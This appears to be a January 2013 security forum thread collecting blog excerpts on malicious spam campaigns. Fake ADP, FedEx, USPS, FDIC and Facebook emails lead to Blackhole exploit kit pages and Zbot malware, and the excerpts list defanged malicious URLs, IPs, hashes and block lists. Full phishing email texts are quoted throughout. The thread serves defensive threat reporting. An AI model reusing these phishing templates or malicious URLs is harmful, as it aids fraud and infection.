23 Jan 2013 - "... fake NACHA spam leads to malware on canonicalgrumbles .biz... The malicious payload is at [donotclick]canonicalgrumbles .biz/closest/984y3fh8u3hfu3jcihei.php (report here*) hosted on 93.190.46.138 (Ukranian Hosting / ukrainianhosting .com). I've seen other malware servers in 93.190.40.0/21 before, I would recommend blocking the whole lot."
(More detail at the dynamoo URL above.)
* http://urlquery.net/report.php?id=814512
___
Bogus Job SPAM ...
- http://blog.dynamoo.com/2013/01/h-seal-is-real-legitimate-firm.html
23 Jan 2013 - "H Seal is a real, legitimate firm. This email is -not- from H Seal, but a criminal organisation wanting to recruit people for money laundering and other unlawful activities. Originating IP is 199.254.123.20 ..."
(More detail at the dynamoo URL above.)
___
Fake Corporate eFax SPAM / 13.carnovirious .net
- http://blog.dynamoo.com/2013/01/corporate-efax-spam-13carnoviriousnet.html
23 Jan 2013 - "This spam is leading to malware on 13.carnovirious .net, a domain spotted earlier today.. but one that has switched server to 74.91.117.49 since then... The spam leads to an exploit kit on [donotclick]13.carnovirious .net/read/persons_jobs.php hosted on 74.91.117.49 by Nuclear Fallout Enterprises. You should probably block 74.91.117.50 as well..."
(More detail at the dynamoo URL above.)
___
Fake USPS SPAM / euronotedetector .net
- http://blog.dynamoo.com/2013/01/usps-spam-euronotedetectornet.html
23 Jan 2013 - "This fake USPS spam leads to malware on euronotedetector .net... The malicious payload is at [donotclick]euronotedetector .net/detects/updated_led-concerns.php hosted on the familiar IP address of 222.238.109.66 (Hanaro Telecome, Korea) which has been used in several recent attacks..."
(More detail at the dynamoo URL above.)
___
Fake BT Business SPAM / esenstialin .ru
- http://blog.dynamoo.com/2013/01/bt-business-spam-esenstialinru.html
23 Jan 2013 - "This fake BT Business spam leads to malware on esenstialin .ru... The malicious payload is on [donotclick]esenstialin .ru:8080/forum/links/column.php hosted on the following IPs:
50.31.1.104 (Steadfast Networks, US)
91.224.135.20 (Proservis UAB, Lithunia)..."
(More detail at the dynamoo URL above.)
___
Something evil on 74.91.117.50
- http://blog.dynamoo.com/2013/01/something-evil-on-749111750.html
23 Jan 2013 - "OK, I can see just two malicious domains on 74.91.117.50 but they are currently spreading an exploit kit through this spam run. The domain is allocated to Nuclear Fallout Enterprises who often seem to host malware sites like this, so there's a good chance that more evil will turn up on this IP.
These are the domains that I can see right now:
13.blumotorada .net
13.carnovirious .net
The domains are registered wit these apparently fake details:
Glen Drobney office @glenarrinera .com
1118 hagler dr / neptune bch
FL 32266 US
Phone: +1.9044019773
Since there will almost definitely be more malicious domains coming up on this IP, it is well worth blocking."
___
Fake ADP SPAM / elemikn .ru
- http://blog.dynamoo.com/2013/01/adp-spam-elemiknru.html
22 Jan 2013 - "This fake ADP spam potentially leads to malware on elemikn .ru:
Date: Tue, 22 Jan 2013 12:25:06 +0100
From: LinkedIn [welcome @linkedin .com]
Subject: ADP Immediate Notification
ADP Immediate Notification
Reference #: 815979361
Tue, 22 Jan 2013 12:25:06 +0100
Dear ADP Client
Your Transfer Record(s) have been created at the web site:
https ://www .flexdirect .adp .com/client/login.aspx
Please see the following notes:
Please note that your bank account will be debited within one banking business day for the amount(s) shown on the report(s).
Please do not respond or reply to this automated e-mail. If you have any questions or comments, please Contact your ADP Benefits Specialist.
This note was sent to acting users in your system that approach ADP Netsecure.
As usual, thank you for choosing ADP as your business affiliate!
Ref: 286532564
HR. Payroll. Benefits.
The ADP logo and ADP are registered trademarks of ADP, Inc.
In the business of your success is a service mark of ADP, Inc.
© 2013 ADP, Inc. All rights reserved.
The malicious payload is at [donotclick]elemikn .ru:8080/forum/links/column.php but at the moment the domain does not seem to be resolving (which is a good thing!)
___
Fake "Batch Payment File Reversed" SPAM / kendallvile .com
- http://blog.dynamoo.com/2013/01/batch-payment-file-reversed-spam.html
22 Jan 2013 - "This spam leads to malware on kendallvile .com:
From: batchservice @eftps .net [batchservice @eftps .net]
Date: 22 January 2013 17:56
Subject: Batch Payment File Reversed
=== PLEASE NOT REPLY TO THIS MESSAGE===
[redacted]
This notification was mailed to inform you that your payment file has Reversed. 2013-01-21-9.56.22.496135
Detailed information is accessible by sign into the Batch Provider with this link.
--
With Best Regards,
EFTPS
Contact Us: EFTPS Batch Provider Customer Service
This leads to an exploit kit on [donotclick]kendallvile .com/detects/exceptions_authority_distance_disturbing.php (report here*) hosted on the very familiar IP address of 222.238.109.66 (Hanaro Telecom, Korea) which should be blocked if you can."
* http://www.urlquery.net/report.php?id=802578
:fear::mad::mad:
AplusWebMaster
2013-01-24, 16:15
FYI...
Fake Flash Updates - via SPAM attachment...
- http://www.gfi.com/blog/fake-adobe-flash-updates-resurfaces-in-the-web/
Jan 24, 2013 - "Following the return of fake Google Chrome browser updates almost two weeks ago, online criminals are now banking on fake Adobe Flash Player updates to lure the unwary user into downloading malware onto their system... spam emails claiming to be from the Better Business Bureau (BBB) and eFax Corporate... The BBB email contains an attachment that is found to be a Pony downloader that, once opened, downloads a variant of the ZeuS banking Trojan onto the affected user’s system. The said downloader also steals various passwords related to FTP sites..."
(Screenshots available at the gfi URL above.)
___
Malicious BT SPAM
- http://www.gfi.com/blog/beware-malicious-bt-spam-landing-in-inboxes/
Jan 24, 2013 - "... if you’re a client of the BT (British Telecom) Group, be warned that there is a new spam campaign under the guise of a “Notice of Delivery” mail* pretending to originate from BT Business Direct... Once users download and open the attached HTM file, they are -redirected- to a Russian website the file calls back to. The website serves a Blackhole Exploit Kit, which then downloads Cridex once it finds a software vulnerability..."
* http://gfisoftware.tumblr.com/post/41277073286/british-telecom-order-notice-attachment-spam
___
Fake ADP SPAM / 14.sofacomplete .com
- http://blog.dynamoo.com/2013/01/adp-spam-14sofacompletecom.html
24 Jan 2013 - "This fake ADP spam leads to malware on 14.sofacomplete .com:
From: Erna_Thurman @ADP .com Date: 24 January 2013 17:48
Subject: ADP Generated Message: Final Notice - Digital Certificate Expiration
This e-mail has been sent from an automated system. PLEASE DO NOT REPLY. If you have any questions, please contact your administrator for assistance.
Digital Certificate About to Expire
The digital certificate you use to access ADP's Internet services is about to expire. If you do not renew your certificate by the expiration date below, you will not be able to access ADP's Internet services.
Days left before expiration: 1
Expiration date: Jan 25 23:59:59 GMT-03:59 2013
Renewing Your Digital Certificate
1. Go to this URL: https ://netsecure.adp .com/pages/cert/register2.jsp
2. Follow the instructions on the screen.
3. Also you can download new digital certificate at https ://netsecure.adp .com/pages/cert/pickUpCert.faces.
Deleting Your Old Digital Certificate
After you renew your digital certificate, be sure to delete the old certificate. Follow the instructions at the end of the renewal process.
The malicious payload is at [donotclick]14.sofacomplete .com/read/saint_hate-namely_fails.php hosted on 73.246.103.26 (Comcast, US). There will probably be other malicious domains on this same IP, so blocking it may be useful."
___
Fake LinkedIn emails lead to client-side exploits and malware
- http://blog.webroot.com/2013/01/24/fake-linkedin-invitation-notifications-themed-emails-lead-to-client-side-exploits-and-malware/
Jan 24, 2013 - "... Over the past 24 hours, cybercriminals have launched yet another massive spam campaign, impersonating LinkedIn, in an attempt to trick its users into clicking on the malicious links found in the bogus “Invitation Notification” themed emails. Once they click on the links, users are automatically exposed to the client-side exploits served by the Black Hole Exploit Kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/01/fake_linkedin_invitation_notification_email_spam_malware_exploits_black_hole_exploit_kit.png
... Name servers used by these malicious domains:
Name server: ns1.http-page .net – 31.170.106.17 – Email: ezvalue @yahoo .com
Name server: ns2.http-page .net – 7.129.51.158 – Email: ezvalue @yahoo .com
Name Server: ns1.high-grades .com – 208.117.43.145
Name Server: ns2.high-grades .com – 92.121.9.25
Sample malicious payload dropping URL:
hxxp ://shininghill .net/detects/solved-surely-considerable.php?vf=1o:31:1h:1l:2w&fe=33:1o:1g:1l:1m:1k:2v:1l:1o:32&n=1f&dw=w&qs=p
Upon successful client-side exploitation, the campaign drops MD5: fdc05614f56aca9421271887c1937f51 * ...Trojan-Spy.Win32.Zbot.ihgm.
Upon execution, the same creates the following process on the affected hosts:
%AppData%\Bytaa\yjdoly.exe
The following registry keys:
HKEY_CURRENT_USER\Software\Microsoft\Rekime
... Once executed, the sample also attempts to establish multiple UDP connections with the following IPs:
177.1.100.2 :11709
190.33.36.175 :11404
213.109.254.122 :29436
41.69.182.117 :29817
64.219.114.114 :13503
161.184.174.65 :14545
93.177.174.72 :10119
69.132.202.147 :16149..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/file/224c9e5c9b94738738c2e522770095d63bbd7eaaafa147283aca261df445b58d/analysis/
File name: info.ex_
Detection ratio: 30/44
Analysis date: 2013-01-23
___
Fake pharma sites 24/1/13
- http://blog.dynamoo.com/2013/01/fake-pharma-sites-24113.html
24 Jan 2013 - "Here's an updated list of fake RX sites being promoted through vague spam like this:
Date: Thu, 24 Jan 2013 04:44:45 +0000 (GMT)
From: "Account Info Change" [noreply @etraxx .com]
Subject: Updated information
Attention please:
- Over 50 new positions added (view recently added products)
- Free positions included with all accounts (read more here)
- The hottest products awaiting you in the first weeks of the new year (read more here)
- We want you to feel as comfortable as possible while you?re at our portal.
Click Here to Unsubscribe
As with a few days ago, these sites are hosted on:
199.59.56.59 (Hostwinds, Australia)
209.236.67.220 (WestHost Inc, US)
Currently active spamvertised sites are as follows:
(Long list available at the dynamoo URL above.)
___
Fake Efax Corporate SPAM / epimarkun .ru
- http://blog.dynamoo.com/2013/01/efax-corporate-spam-epimarkunru.html
24 Jan 2013 - "This fake eFax spam leads to malware on epimarkun .ru:
Date: Thu, 24 Jan 2013 04:04:42 +0600
From: Habbo Hotel [auto-contact @habbo .com]
Subject: Efax Corporate
Attachments: Efax_Corporate.htm
Fax Message [Caller-ID: 963153883]
You have received a 28 pages fax at Thu, 24 Jan 2013 04:04:42 +0600, (157)-194-4168.
* The reference number for this fax is [eFAX-009228416].
View attached fax using your Internet Browser.
� 2013 j2 Global Communications, Inc. All rights reserved.
eFax � is a registered trademark of j2 Global Communications, Inc.
This account is subject to the terms listed in the eFax � Customer Agreement.
There is an attachment called Efax_Corporate.htm leading to a malicious payload at [donotclick]epimarkun .ru:8080/forum/links/column.php which is hosted on the following IPs:
50.31.1.104 (Steadfast Networks, US)
94.23.3.196 (OVH, France)
202.72.245.146 (Mongolian Railway Commercial Center, Mongolia)
These IPs and domains are all malicious:
50.31.1.104
94.23.3.196
202.72.245.146
dmssmgf .ru
esekundi .ru
esenstialin .ru
disownon .ru
epimarkun .ru
damagalko .ru
dumarianoko .ru
epiratko .ru
dfudont .ru ..."
:fear::mad:
AplusWebMaster
2013-01-25, 17:04
FYI...
Chase Phish, LinkedIn, American Express Open and Verizon Wireless Spam
- http://www.gfi.com/blog/email-threats-highlights-chase-phish-linkedin-american-express-open-and-verizon-wireless-spam/
Jan 25, 2013 - "In this week’s Email Threats roundup, we are highlighting spam and phishing campaigns that have made a comeback, such as LinkedIn and Chase spam, but took advantage of different social engineering lures this time around. You Know It’s Awkward When… you receive an email notification that claims to originate from LinkedIn, saying you have an event invitation from one of your employees; however, (1) you don’t own a company and (2) you don’t have people under you that you can call “employees.” Furthermore, isn’t LinkedIn Events the latest thing-of-the-past?... these don’t matter now. What does matter is that recipients should not click any of the malicious links in the message body as they lead to serious system infections..."
- http://gfisoftware.tumblr.com/post/40690037065/chase-online-credentials-phish
- http://gfisoftware.tumblr.com/post/40852233046/malicious-linkedin-spam
- http://gfisoftware.tumblr.com/post/40682042750/malicious-american-express-open-spam
- http://gfisoftware.tumblr.com/post/40603662118/malicious-verizon-wireless-spam
___
Fake Craigslist fax-to-email...
- http://techblog.avira.com/2013/01/25/malware-delivered-with-fake-craigslist-fax-to-email-notifications/en/
Jan 25, 2013 - "If you receive such a message containing an HTML page attached, don’t open it. The email pretends to come from “craigslist – automated message, do not reply <robot @craigslist .org>” and has the subject ”Efax Corporate”...
> http://techblog.avira.com/wp-content/uploads/2013/01/craigslist-fax-malware.jpg
... contains a malicious java script code which would download malware on your computer.
> http://techblog.avira.com/wp-content/uploads/2013/01/craigslist-malware.jpg ..."
___
Fake UPS SPAM / eziponoma .ru
- http://blog.dynamoo.com/2013/01/ups-spam-eziponomaru.html
25 Jan 2013 - "This fake UPS spam leads to malware on eziponoma .ru:
From: messages-noreply @bounce .linkedin .com... On Behalf Of LinkedIn Password
Sent: 25 January 2013 04:12
Subject: UPS Tracking Number H0931698016
You can use UPS Services to:
Ship Online
Schedule a Pickup
Open a UPS Services Account
Welcome to UPS .com Customer Services
Hi, [redacted].
DEAR CLIENT , RECIPIENT'S ADDRESS IS WRONG
PLEASE PRINT OUT THE INVOICE COPY ATTACHED AND COLLECT THE PACKAGE AT OUR DEPARTMENT.
With Respect , Your UPS Customer Services...
The malicious payload is at [donotclick]eziponoma .ru:8080/forum/links/column.php which is hosted on:
94.23.3.196 (OVH, France)
195.210.47.208 (PS Internet Company, Kazakhstan)
202.72.245.146 (Railcom, Mongolia)"
___
Fake FedEx SPAM / vespaboise .net
- http://blog.dynamoo.com/2013/01/fedex-spam-vespaboisenet.html
25 Jan 2013 - "This fake FedEx spam leads to malware on vespaboise .net:
Date: Fri, 25 Jan 2013 15:39:33 +0200
From: services @fedex .com
Subject: FedEx Billing - Bill Prepared to be Paid
FedEx Billing - Bill Prepared to be Paid
fedex.com
[redacted]
You have a new invoice(s) from FedEx that is prepared for discharge.
The following invoice(s) are ready for your overview:
Invoice Number
Invoice Amount
2-649-22849
49.81
1-181-19580
257.40
To pay or overview these invoices, please log in to your FedEx Billing Online account proceeding this link: http ://www.fedex .com/us/account/fbo
Note: Please do not use this email to submit payment. This email may not be used as a remittance notice. To pay your invoices, please visit FedEx Billing Online, http ://www.fedex .com/us/account/fbo
Thank you,
Revenue Services
FedEx
Please Not try to reply to this message. auto informer system cannot accept incoming mail.
The content of this message is protected by copyright and trademark laws under U.S. and international law.
review our privacy policy . All rights reserved.
The malicious payload is at [donotclick]vespaboise .net/detects/invoice_overview.php which is on the very familiar IP address of 222.238.109.66 (Hanaro Telecom, Korea) which has been used in several recent attacks.. blocking it would be prudent."
___
Blackhole exploit kit - distribution
- http://www.symantec.com/connect/blogs/trojanpandex-new-spam-affair
Jan 24, 2013 - "... -redirect- ... to the following malicious URL:
dfudont .ru :8080/[REMOVED]/column.php...
BlackHole v2 exploit kit, and our telemetry data indicates that we have detected the following signatures from the malicious URL:
Web Attack: Blackhole Exploit Kit Website 8
Web Attack: Blackhole Exploit Kit
Web Attack: Blackhole Functions
Web Attack: Blackhole Toolkit Website 20
Web Attack: Blackhole Toolkit Website 31...
Heatmap distribution for IPS detections associated with Blackhole exploit kit:
> https://www.symantec.com/connect/sites/default/files/images/image4_26.png
... If the Blackhole exploit is successful, W32.Cridex* is then downloaded onto the compromised computer... ensure operating systems and software are up to date and to avoid clicking on suspicious links while browsing the Internet or checking email."
* W32.Cridex: https://www.symantec.com/security_response/writeup.jsp?docid=2012-012103-0840-99
W32.Cridex!gen1: https://www.symantec.com/security_response/writeup.jsp?docid=2012-032300-4035-99
- http://centralops.net/co/DomainDossier.aspx - Jan 25, 2013
canonical name dfudont .ru
addresses: 94.23.3.196, 195.210.47.208, 202.72.245.146
domain: DFUDONT .RU
nserver: ns1.dfudont .ru. 62.76.185.169
nserver: ns2.dfudont .ru. 41.168.5.140
nserver: ns3.dfudont .ru. 42.121.116.38
nserver: ns4.dfudont .ru. 110.164.58.250
nserver: ns5.dfudont .ru. 210.71.250.131
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person...
country: FR
origin: AS16276
- https://www.google.com/safebrowsing/diagnostic?site=AS:16276
"... over the past 90 days, 7886 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-01-25, and the last time suspicious content was found was on 2013-01-25... we found 458 site(s) on this network... that appeared to function as intermediaries for the infection of 3498 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 1447 site(s)... that infected 6601 other site(s)..."
- http://centralops.net/co/DomainDossier.aspx - Jan 27, 2013
canonical name dfudont .ru
addresses: 195.210.47.208, 202.72.245.146
domain: DFUDONT .RU
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person...
country: KZ - Kazakhstan
origin: AS48716
- https://www.google.com/safebrowsing/diagnostic?site=AS:48716
"... over the past 90 days, 25 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-01-27, and the last time suspicious content was found was on 2013-01-27... we found 6 site(s) on this network... that appeared to function as intermediaries for the infection of 5 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 23 site(s)... that infected 965 other site(s)..."
:mad: :fear:
AplusWebMaster
2013-01-27, 14:47
FYI...
Bogus BBB emails spread Zbot...
- http://www.hotforsecurity.com/blog/new-wave-of-bbb-scam-spreads-downloader-of-zbot-5135.html
Jan 25, 2013 - "... Better Business Bureau spam campaign.... the e-mails infect people with a Trojan that steals sensitive information from recipients... the BBB attack consists of a message supposedly from the Better Business Bureau telling recipients that a business customer has filed a formal complaint against them. The bogus e-mail invites the recipient to reply and mend the situation, but not before they open the attached document that, depending on the campaign, hides a downloader, a password stealer, and a BlackHole component. The subject line of these messages generally read: “complaint report,” “complaint ID,” “case” and a set of random digits. The bogus e-mails used in the January campaign carry as an attachment a zip file named “case” and arbitrary signs that hide a password stealer and a downloader of ZBot – identified by Bitdefender as Trojan.Generic.KD.835502. To make it more believable, attackers deliver the exe file with the Adobe Reader icon, so if file extensions are hidden by the operating system, chances are you’ll mistake it for a PDF document...
> http://www.hotforsecurity.com/wp-content/uploads/2013/01/New-wave-of-BBB-Scam-spreads-Downloader-of-ZBot.png
ZBot is a banker Trojan that steals e-banking information and logs keystrokes, but also has some limited backdoor and proxy features that allows its masters to take control of the machine. Crooks seem to find the BBB scam highly rewarding, as they refresh it several times a year since it was first spotted in 2010. It was November 2012 when Bitdefender anti-spam lab signaled another huge wave of BBB scam spreading Trojan.Generic.8271699, a downloader awfully similar to the infamous BlackHole exploit pack... Organizations such as the Better Business Bureau NEVER send complaints via e-mail with attachments and links, exactly to avoid frauds. EXE files are a big no-no in e-mail messages. In fact, they are so dangerous that no company will e-mail you this kind of attachment. If your e-mail messages carry an exe file, just get rid of it..."
___
Super Bowl Scams ...
- https://www.bbb.org/blog/2013/01/dont-fall-for-the-latest-super-bowl-scams/
Jan 22, 2013 - "... be on the alert for knock-off team jerseys, counterfeit memorabilia and phony game tickets... Tickets for the big game can be an even bigger rip-off. There are thousands of Super Bowl tickets currently listed on Craig’s List, but the site offers no guarantees of any kind and does not require identification of its listers. Buying in person isn’t always an improvement, as it’s gotten easier and easier for scammers to make fake tickets that look real... In general, avoid scams by being -skeptical- of:
• Offers that sound “too good to be true”
• Pushy sales tactics
• Poor quality of merchandise
• Offers that require wire transfer of funds ..."
More: https://www.bbb.org/blog/
___
Phishing Scams use Facebook Info for Personalized SPAM
- https://www.bbb.org/blog/2013/01/new-wave-of-phishing-scams-uses-facebook-info-for-personalized-spam/
Jan 25, 2013 - "... scammers are exploiting the fact that you’re more likely to click on a link if it was sent by a friend. Scammers find your information through Facebook or other social media accounts. Some set up fake accounts and send out friend requests. When you accept the request, they can view your friends and personal and contact information. Other scammers rely on social media users not locking down their privacy settings*, so basic information, such as your name, email address and friends’ names, is publicly available..."
* http://www.facebook.com/help/392235220834308/
:mad::sad:
AplusWebMaster
2013-01-28, 14:10
FYI...
Bogus Paypal emails lead to BlackHole Exploit Kit
- http://blog.webroot.com/2013/01/28/bogus-your-paypal-transaction-confirmation-themed-emails-lead-to-black-hole-exploit-kit/
Jan 28, 2013 - "... Over the past 24 hours, cybercriminals have launched yet another spam campaign, impersonating PayPal, in an attempt to trick its users into thinking that they’ve received a “Transaction Confirmation“, which in reality they never really made. Once users click on -any- of the links found in the malicious emails, they’re exposed to the client-side exploits served by the Black Hole Exploit Kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/01/fake_paypal_transaction_confirmation_email_spam_exploits_malware_black_hole_exploit_kit.png
... Malicious domain name reconnaissance:
duriginal .net – 222.238.109.66 – Email: blackchromedesign2 @ymail .com
Name server: NS1.HTTP-PAGE .NET – 31.170.106.17 – Email: ezvalue @yahoo .com
Name server: NS2.HTTP-PAGE .NET – 7.129.51.158 – Email: ezvalue @yahoo .com
The campaign shares the same infrastructure... three of these campaigns have been launched by the same malicious party.
Upon successsful client-side exploitation, the campaign drops MD5: 423daf9994d552ca43f8958634ede6ee * ...Trojan-Spy.Win32.Zbot.ilmw..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/file/56af982933dac49ad067146971d60608964010f9bdc27c8ba69fa5e8eeafe199/analysis/
File name: contacts.exe
Detection ratio: 25/46
Analysis date: 2013-01-28
___
Zbot sites to block - 28/1/13
- http://blog.dynamoo.com/2013/01/zbot-sites-to-block-28113.html
28 Jan 2013 - "These domains and IPs are currently acting as C&C and distribution servers for Zbot. I would advise blocking these IPs and domains if you can. There are three parts to the list: IPs with hosting company names, plain IPs for copy-and-pasting and domains identified on these servers..."
(Long list at the dynamoo URL above.)
___
Fake Facebook SPAM / gonita .net
- http://blog.dynamoo.com/2013/01/most-recent-events-on-facebook-spam.html
28 Jan 2013 - "This fake Facebook spam leads to malware on gonita .net:
Date: Mon, 28 Jan 2013 17:30:50 +0100
From: "Facebook" [addlingabn2 @bmatter .com]
Subject: Most recent events on Facebook
facebook
Hi [redacted],
You have disabled your Facebook account. You can reveal your account whenever you wish by logging into Facebook with your old login email address and password. After that you will be able to enjoy the site in the same way as before.
Kind regards,
The Facebook Team
Log in to Facebook and start connecting
Sign in
Please use the link below to resume your account :
http ://www.facebook .com/resume/
This message was sent to [redacted]. If you don't want to receive these emails from Facebook in the future, please click: unsubscribe.
Facebook, Inc. Attention: Department 419 P.O Box 10007 Palo Alto CA 94301
The malicious payload is at [donotclick]gonita .net/detects/sign_on_to_resume.php (report here) hosted on the well-known IP of 222.238.109.66 (Hanaro Telecom, Korea)... malicious domains are active on the same IP..."
:mad:
AplusWebMaster
2013-01-30, 16:05
FYI...
Intelius SPAM (or is it a data breach?)
- http://blog.dynamoo.com/2013/01/intelius-spam-or-is-it-data-breach.html
30 Jan 2013 - "This spam was sent to an email address only used for register for intelius.com . Either there has been a data breach at Intelius, or they have decided to go into the gambling business.
From: Grand Palace Slots [no-reply @tsm -forum .net]
Date: 30 January 2013 10:39
Subject: Try to play slots - 10$ free
Mailed-By: tsm-forum .net
Feel the unique excitement of playing at the world's premiere games!
Grand Palace gives you welcome package for slots up to 8,000$! What a fantastic offer, straight from the heart of World's gaming leader!
This is a great offer, especially when you see what else Grand Palace has to offer:
- US players welcome
- more than 100 fun games, realistic graphics
- the most secure and up-to-date software
- professional support staff to help you with whatever you might need, any time of the day or night!
And in the end we want to give you 10$ absolutelly free! (Use code CASH10)
Hurry up! Your free Grand Palace cash is waiting! Play Today!
http ://www .igrandpalacegold .com
Click here to opt out of this email:
http ://unsubscribe .igrandpalacegold .com
The originating IP is 176.200.202.100 (Telecom Italia, Italy), spamvertised site is www .igrandpalacegold .com on 91.217.52.125 (Fajncom SRO, Czech Republic)... I'm assuming that Intelius doesn't want to promote what would be illegal gambling for US citizens, which really leads just one other option.."
___
Fake FedEx emails lead to BlackHole Exploit Kit
- http://blog.webroot.com/2013/01/29/fake-fedex-online-billing-invoice-prepared-to-be-paid-themed-emails-lead-to-black-hole-exploit-kit/
Jan 29, 2013 - "... Cybercriminals are currently mass mailing tens of thousands of emails impersonating the company, in an attempt to trick its customers into clicking on exploits and malware dropping links found in the legitimate-looking emails...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/01/fedex_online_billing_fake_email_spam_exploits_malware_black_hole_exploit_kit.png
... Malicious domain name reconnaissance:
vespaboise.net – 222.238.109.66 – Email: blackchromedesign2 @ymail .com
Name Server: NS1.HTTP-PAGE .NET
Name Server: NS2.HTTP-PAGE .NET
... Upon successful client-side exploitation, the FedEx themed campaign drops MD5: c2f72ff5b0cf4dec4ce33e4cc65796b1 * ...PWS:Win32/Zbot.gen!AM.
... It also attempts to connect to the following IPs:
14.96.171.173, 64.219.114.114, 68.49.120.165, 70.50.58.41, 70.136.9.2, 71.42.56.253,
71.43.217.3, 72.218.14.223, 76.219.198.177, 80.252.59.142, 83.111.92.83, 87.5.135.46,
87.203.87.232, 98.71.136.168, 98.245.242.245, 108.83.233.190. 115.133.156.53,
151.66.19.166. 194.94.127.98, 206.45.59.85 ..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/file/1e896734d13002b29fd2a9d6594ed6bc938a83785b81be71b9788efbcc3bd1df/analysis/
File name: calc.exe
Detection ratio: 24/46
Analysis date: 2013-01-30
___
Malicious Spam Emails Target Nightclub Disaster in Santa Maria
- http://www.symantec.com/connect/blogs/malicious-spam-emails-target-nightclub-disaster-santa-maria
Jan 30, 2013 - "... spammers are distributing malicious emails that attempt to lure users into viewing a video of the incident that killed 233 people recently in a horrific tragedy at a popular nightclub in Santa Maria, Brazil. The malicious email is in Portuguese and invites unsuspecting users to click on a link to watch a video of the tragedy. The link provided in the email downloads a zip file containing a malicious control panel file as well an executable file. Symantec detects this threat as Trojan Horse. Further analysis of the malicious file shows that the threat creates the following file:
%SystemDrive%\ProgramData\ift.txt
It also alters the registry entries for Internet Explorer. The threat then downloads an IE configuration file from a recently registered domain. Trojan Horse is usually a backdoor Trojan, downloader, or an infostealer. Samples of the spam emails are shown below (Figures 1 and 2). The email has the following characteristics:
Subject: Video mostra momento exato da tragedia em Santa Maria no Rio Grande Do Sul segunda-feira, 28 de janeiro de 2013
Subject: VIDEO DO ACIDENTE DA BOATE DE SANTA MARIA RS.
Translation: Video shows the beginning of the tragedy in Santa Maria, Rio Grande Do Sul Monday, January 28, 2013
Translation: Video of the Nightclub accident in Santa Maria RS
1) https://www.symantec.com/connect/sites/default/files/images/NightclubDisasterSpam1_0.png
2) https://www.symantec.com/connect/sites/default/files/images/NightclubDisasterSpam2_0.png
Users are advised to exercise caution when looking for videos, images, and news of recent popular events. Do not click on suspicious links or open attachments received in unsolicited emails. Keep your security software up-to-date in order to protect your information from online viruses and scams."
___
Fake FDIC SPAM / 1wstdfgh.organiccrap .com
- http://blog.dynamoo.com/2013/01/fdic-spam-1wstdfghorganiccrapcom.html
30 Jan 2013 - "Here's a slightly new spin on old spam, leading to malware on 1wstdfgh.organiccrap .com:
Date: Wed, 30 Jan 2013 16:16:32 +0200
From: "Тимур.Носков @fdic .gov" [midshipmanc631 @buprousa .com]
Subject: Important notice from FDIC
Attention!
Due to the adoption of a new security system, that is aimed at diminishing the number of cases of fraud and scams, all your ACH and WIRE transactions will be temporarily blocked until your security version meets the new requirements.. In order to restore your ability to make transactions, you are required to install a special security software. Please use the link below to download and install all the necessary files.
We apologize for causing you troubles by this measure.
If you need any assistance, please do not hesitate to contact us.
Sincerely yours,
Federal Deposit Insurance Corporation
Security Department
The link in the email goes through a legitimate hacked site (in this case [donotclick]www.edenespinosa .com/track .php?fdic) to the amusingly named [donotclick]1wstdfgh.organiccrap .com/closest/984y3fh8u3hfu3jcihei .php (report here*) hosted on 91.218.121.86 (CoolVDS / Kutcevol Maksum Mukolaevichm, US) which hosts the following suspect domains that you might want to block:
1wstdfgh.organiccrap .com
23v4tn6dgdr.organiccrap .com
v446numygjsrg.mymom .info
3vbtnyumv.ns02 .us
crvbhn7jbtd.mywww .biz "
* http://urlquery.net/report.php?id=891059
:mad:
AplusWebMaster
2013-01-31, 15:51
FYI...
Fake FDIC SPAM / 123435jynfbdf.myWWW .biz
- http://blog.dynamoo.com/2013/01/fdic-spam-123435jynfbdfmywwwbiz.html
31 Jan 2013 - "More FDIC themed spam, leading to a malicious payload on the same IP as this one:
From: ".Афанасьев @fdic .gov" [mailto:dickysmv341 @homesextapes .com]
Sent: 30 January 2013 15:03
Subject: Changing security requirements
Importance: High
Dear Sirs,
In connection with the introduction of a new security system for the purpose of preventing new cases of wire fraud, all your account ACH and WIRE transactions will be temporarily blocked unless the special security requirements are met.. In order to fully re-establish your account, you are asked to install a special security software. Please open the link below to download and install the latest security version.
We apologize for the inconveniences caused to you by this measure.
Please do not hesitate to contact us if you have any questions.
Yours faithfully,
Federal Deposit Insurance Corporation
Security Department
In this case the malicious payload is at [donotclick]123435jynfbdf.myWWW .biz./closest/984y3fh8u3hfu3jcihei.php and is hosted on 91.218.121.86 (CoolVDS / Kutcevol Maksum Mukolaevichm, US). At the moment the following domains seem to be active:
123435jynfbdf.myWWW .biz
1wstdfgh.organiccrap .com
23v4tn6dgdr.organiccrap .com
v446numygjsrg.mymom .info
1wvrbtnytjtyjj.mymom .info
1ewgthytj.mymom .info
3vbtnyumv.ns02 .us
crvbhn7jbtd.mywww .biz
1dfcsdbnhgnnh.mywww .biz
13rehjkfr.mywww .biz
___
Malicious ‘Facebook Account Cancellation Request” themed emails serve client-side exploits and malware
- http://blog.webroot.com/2013/01/31/malicious-facebook-account-cancellation-request-themed-emails-serve-client-side-exploits-and-malware/
Jan 31, 2013 - "In December, 2012, we intercepted a professional-looking email that was impersonating Facebook Inc. in an attempt to trick its users into thinking that they’ve received an “Account Cancellation Request“. In reality, once users clicked on the links, their hosts were automatically exploited through outdated and already patched client-side vulnerabilities, which dropped malware on the affected PCs. Over the past 24 hours, cybercriminals have resumed spamvertising tens of thousands of legitimate-looking Facebook themed emails, once again using the same social engineering theme...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/01/fake_facebook_account_cancellation_request_email_spam_exploits_malware.png
... Sample client-side exploits served: CVE-2010-0188; CVE-2011-3544; CVE-2010-0840
... Malicious domain name reconnaissance:
kidstoytowers .com – 62.75.181.220 – responding to the same IP is also the following domain – dailyfrontiernews .com
